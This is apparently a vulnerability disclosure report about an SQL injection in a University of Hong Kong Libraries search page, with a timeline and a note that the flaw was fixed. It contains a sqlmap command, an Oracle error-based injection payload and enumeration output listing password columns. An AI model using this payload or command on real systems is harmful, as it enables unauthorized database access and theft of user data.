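2015-12-07: Details reported to the vendor; awaiting vendor handling
2015-12-10: Vendor confirmed; details disclosed to the vendor only
2015-12-20: Details disclosed to core white hats and experts in related fields
2015-12-21: Vendor fixed the vulnerability and proactively disclosed it; details disclosed to the public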
SQL injection vulnerability in The University of Hong Kong Libraries (1.82 million user records leaked)
URL: http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a
$ python sqlmap.py -u "http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a" -p the_key --technique=E --output-dir=output --random-agent --batch --no-cast -D NDLC -T EJ_996 --columns
Database: NDLC
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EJ_996                         | 1820120 |
+--------------------------------+---------+
web application technology: JSP
back-end DBMS: Oracle
Database: NDLC
Table: EJ_996
[17 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| NO_USERS           | VARCHAR2 |
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL_PASSWORD       | VARCHAR2 |
+--------------------+----------+
---
Parameter: the_key (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: the_key=China Biography'||(SELECT 'JUyI' FROM DUAL WHERE 4168=4168 AND 2419=CTXSYS.DRITHSX.SN(2419,(CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2419=2419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(107)||CHR(113))))||'&the_field=sb&the_lang=a
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'NDLC'
current user is DBA: False
web application technology: JSP
back-end DBMS: Oracle
Database: NDLC
Table: EJ_996
[17 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| BIB                | NUMBER   |
| COVERAGE           | VARCHAR2 |
| FORMAT             | VARCHAR2 |
| IP_FILTER          | VARCHAR2 |
| LOCATION           | VARCHAR2 |
| MEGACD             | VARCHAR2 |
| NO_USERS           | VARCHAR2 |
| NOTES              | CHAR     |
| NOTES_URL          | VARCHAR2 |
| SUBFIELD_Z         | VARCHAR2 |
| SUBFIELDZ_OTHERS   | VARCHAR2 |
| SUBFIELDZ_PASSWORD | VARCHAR2 |
| URL                | VARCHAR2 |
| URL_OTHERS         | VARCHAR2 |
| URL_PASSWORD       | VARCHAR2 |
| VIA                | VARCHAR2 |
| WF                 | NUMBER   |
+--------------------+----------+
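Deploy a WAF.
Severity: High
Vulnerability Rank: 14
Confirmed: 2015-12-10 17:01
The relevant organization has been notified of the incident.
2015-12-21: The relevant organization reported that the vulnerability has been fixed.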